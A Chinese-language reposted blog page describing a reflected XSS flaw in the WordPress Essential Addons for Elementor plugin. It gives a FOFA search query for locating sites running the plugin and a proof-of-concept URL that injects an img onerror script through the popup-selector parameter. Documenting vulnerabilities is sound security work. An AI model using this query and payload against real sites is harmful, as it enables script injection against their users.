欢迎来到尧图网

客户服务关于我们

您的位置：首页 > 汽车 > 时评 > WordPress essential-addons-for-elementor xss漏洞

WordPress essential-addons-for-elementor xss漏洞

2025/4/1 16:58:55 来源：https://blog.csdn.net/2301_78554096/article/details/146717192 浏览: 次关键词：WordPress essential-addons-for-elementor xss漏洞

漏洞描述

Elementor 插件的 Essential Addons 遭受反射型跨站点脚本(XSS)漏洞该漏洞是由于 popup-selector 查询参数的验证和清理不充分而发生的，从而允许将恶意值反映回用户

搜索语法

FOFA:body="/wp-content/plugins/essential-addons-for-elementor-lite"

漏洞再现

https://your-ip/?popup-selector=%3Cimg_src%3Dx_onerror%3Dalert%28%22qaxnb%22%29%3E&eael-lostpassword=1

版权声明:

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com

相关资讯

热文排行

最新新闻

推荐新闻

热搜词